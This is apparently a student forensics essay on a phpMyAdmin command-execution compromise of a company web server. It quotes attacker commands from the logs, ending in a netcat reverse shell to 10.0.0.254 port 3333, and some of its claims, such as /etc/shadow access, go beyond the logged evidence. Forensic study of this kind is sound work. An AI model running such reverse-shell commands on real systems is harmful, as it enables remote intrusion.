This essay has been submitted by a student. This is not an example of the work written by our professional essay writers.
The Global Software Incs website was reported offline after the companys one of the web server was compromised by the attacker. Managing Director (MD) of the company asked us to investigate this issues regarding to find how the web server was attacked and the attackers identity and also powering back on the compromised web server with good counter measures.
The manager provided us the digital assets, the whole investigation and assumptions are made through the analysis of the digital assets that are acquired from the network.
The digital assets are given in three formats they are:
1. Network diagrams ' (au network diagram.jpg, eu network diagram.jpg, us network diagram.jpg, worldwide overview.jpg).
2. Pcap files ' au.pcap, eu.pcap, us.pcap files
3. Syslog files ' au.syslog, eu.syslog, us.syslog files.
Initially I started my investigation from viewing the network diagrams to understand how the internal machines are configured and their IP addressing scheme. And then I started looking at the syslog files to confirm that Australian web server was compromised successfully. As my result of my analysis I came to the conclusion that the attacker first tried metasploit attacks that were not successful (see contemporaneous notes N00).
Then the web server was attacked due to the vulnerability in phpMyAdmin application because the application was installed in the web server with its default configuration and placed in default folder. And it is also seems that the application is not updated to the latest version. So this made the attacker to execute the phpMyAdmin arbitrary command execution vulnerability exploitation to the application.
After the successful exploitation the attacker can able to execute the UNIX commands from his browser to access the folder in the web server's directory (see Contemporaneous notes N00-N0). It is strongly recommended to delete the unwanted application if not in use or if it is in use the software application must be updated frequently.
After the exploitation, the attacker started to explore the folders in the web server's directory. While analyzing I found that the attacker accessed to folders /var/www/password, where the passwords files are stored in the encrypted format. In my assumption the passwords are used to view the log entries of the LDAP server to get any other useful information. I strongly recommend that do not to store any password file inside folder that can be accessible to the internal or external users.
I assume that the attacker has good knowledge about the users those are all in the Australian network associated with the web server. It is because once the attacker examined the LDAP entries, he could able to access the client's machine of the network. The logs also shows that the attacker access to the Linux password repository and copied the data to gsw_super_software.tar.gz (see contemporaneous notes N00). And downloaded the software through SFTP from the server, after acquiring password from machine the attacker SSH into every user in the network system to see which system has access to the web server.
It is strongly recommended to examine the gsw_super_software.tar.gz file that confirms the loss of information from the server.
Once the attacker got the access to the root directory he used the FTP service in the home directory and confirms the working of its service by checking welcome.msg and after this the attacker backup files from the /var directory. Finally he got owned the /bin directory using nc command to his system through the open port whenever the connection is established between web server and his system.
Now the attacker was at the end point, he already gets owned the whole web server's profile. Finally he deleted all files from the web directory and terminates all the system accessed by him. But web server seems to be online because it is not configured to terminate by the other machines. So the attacker used kill process services to the web server.
To power back the web server is very important because the company has to deal with their clients. Before starting the web server it is very important to update the phpMyAdmin application to its latest version or if the utility is not necessary it should be removed.
The unwanted services like Nmap, netcat and SSH should be removed or if it is necessary it should be protected by strong password and kept in user inaccessible folder. It is strongly recommended that not to store any password file in its default directory and it is not necessary to store password and there is no reason for security in it.
The Global Software Inc's Australian network has vulnerability that made the attacker to compromise the web server which made the website offline. From the analysis of log files I confirmed that the attacker was from the US network of the same organization. The analysis of log files shows that there are different types of attacks was tried on the web server and some of the attacks were unsuccessful. When the attacker found the vulnerability in phpMyAdmin software application in the web server was the reason for this attack over the web server. The technical analysis explains detail about the how the web server was compromised and step by step explanation of the attacker footage on the Australian network.
Analysis 1: metasploit attacks
When analyzing the au.syslog file, I could identify the attacker used some of the metasploit attacks on the web server, the attacker used the port 3333 to send the request to the web server from the IP address10.0.0.254. The attacker used the different types of metasploit attacks and also tried to view /intranet folder and it seems that was not accessible. Still the attacker tried various types of attacks. Because of the continuous attacks and concerning time I conclude that the attack is metasploit attack.
the PHP XML-RPC arbitrary code execution it is the first metasploit attack tried by the attack over PHP library files and it seems unsuccessful. Since the attacks are started the web server continuously denied such attack to exploit and the web server was configured securely and that made the attacks unsuccessful. Metasploit contains the predefined exploitation applications which find the vulnerability in the machine and according to the vulnerability it uses the exploitation. But here the web server seems not vulnerable to this attack.
Some of the metasploit attacks attempted are
Badblue 2.5 EXT.dll ' it is a stack buffer overflow attack permits remote attackers to run arbitrary code through a long mfcisapicommand parameter.
Dogfood CRM spell.php- it is also the similar kind of remote command execution attack.
HTTP 0.1 SEARCH ' it is used to check the buffer overflow vulnerability.
NDS (Novell Directory Service) ' it is the stack overflow exploitation in Novell electronic Directory.
Analysis 2: LDAP- Server attack
During analysis of log files, I found the attacker used UNIX commands and get into /var/www/passwords in that the passwords files are stored in encrypted format. And I found one suspicious tar ball folder named as gsw_super_software.tar.gz in which the log entries from the LDAP server and downloaded to the attacker via SFTP. Before exploiting the vulnerability in phpMyAdmin the attacker was not able to access LDAP log index entries. But when the exploitation was successful the attacker had access to the log index entries of the LDAP server. My assumption is the password file in /var/www/passwords should contain the password for the LDAP server so that the attacker after getting the password to got access to the LDAP server and server's log entries are copied to the system 10.0.2.10 and then attacker used the arbitrary commands from the browser to download the contents that made the file as tar ball executed the command and so downloaded via SFTP /gsw_super_software.tar.gz
Analysis 3: phpMyAdmin vulnerability exploitation attack
The Global Software Inc's website reported offline because its web server was compromised. As a result of my investigation I found that the attacker used many of type's attacks like email spamming attack, metasploit attacks but none of those attacks were successful. Finally the attacker got to know about the phpMyAdmin software application that installed on the Australian web server that has vulnerability in it because the software used was not updated to its latest version. That made the attacker to exploit the application with the help of phpMyadmin arbitrary command execution vulnerability exploitation and the attacker was successfully exploited phpMyAdmin application that made the attacker to execute the arbitrary command from his browser window of his own system.
The attacker's exploitation was captured in the log file where the exploitation launched and the information that are stored. That can be acquired from tracing /phpMyAdim/scripts/setup.php folder that stored in the web server.
After the exploitation of phpMyAdmin the attacker was able to execute the arbitrary command from his browser, and during the analysis of the log files I found the attacker executed UNIX command. The UNIX command analysis revealed the complete attacker intention to getting down the server. Before terminating the machines which he got accessed he copied all the content from the systems that accessed by him.
Here is the UNIX command that executed by the attacker.
cat -l /etc/passwd
ls -l /root
ls -l /home
ls -l /home/ftp
cat -l /home/ftp/welcome.msg
cat -l /var
ls -l /var
ls -l /var
ls -l /var/opt
ls -l /var/backups
ls -l /bin
/bin/nc -e /bin/sh 10.0.0.254 3333
Afte the exploitation the attacker used ls command to list the folders in the directory in the web server and he found /etc/passwd directory there the attacker looked into the passwords directory. And then he got into the /etc/shadow there the password files of different machine that are connected to the web server are in encrypted format. And the attacker listed all files. In my assumption the attacker decrypted the password and got the root access to the LDAP server to copy the log index entries to gsw_super_software.tar.gz and downloaded it through SFTP to his machine.
The UNIX command that he executed that made the reverse shell in the web server that enabled the attacker to execute the UNIX command from his system whenever the connection was established.
As a result of this investigation and analysis of log file, In my assumption the attacker was from the system 10.0.0.254 using port 3333 from the US network. When we look at the UNIX command /bin/nc -e /bin/sh 10.0.0.0.254 3333 this command reveals that attacker using nc -e command to make the connection established with the web server through port 3333. I recommend the Global Software Inc organization to acquire the machine and investigate further on this issue.
Restarting the web server and Countermeasures
Before restarting the server it is very important to acquire the machine and examining it thoroughly to find any other vulnerability resides in the server. And it is very important to update the vulnerable phpMyAdmin application to its latest version. During analysis I found some of the machines from the other networks are done spamming attacks so it is also to check the vulnerability in email server as well. And removal of unwanted utilities like nmap, netcat, SFTP and ssh in the user accessible environment.
I recommend acquiring the LDAP server and examining the information of log index entries. In which the attacker copied the entries to gsw_super_software.tar.gz to his system. And assigning strong password to the LDAP server and never store any passwords to the user accessible zone and it is better to not storing the password anywhere in the network.
The firewall configuration should be changed, tuned up to the newly updated network threats. And should be give strong firewall rules and unwanted ports should be closed. And the whole network should be checked under penetration testing experts and then the restarting of the web server will be good and safe.
Finally the Global Software Inc's web server came to the safe condition. and all the backups are restored to it. The investigation and analysis came up with the answers that revealed the cause for the attack and countermeasures to safeguard from future attacks are suggested. On the whole the now the whole security system is under control.
Include here the original stamped memos you submitted
Include here a log of your contemporaneous notes. This can be obtained by executing:
svn log https://svn.cse.dmu.ac.uk:3690/<faculty-id>/csci3427/notes.txt
Include here the latest version of your contemporaneous notes.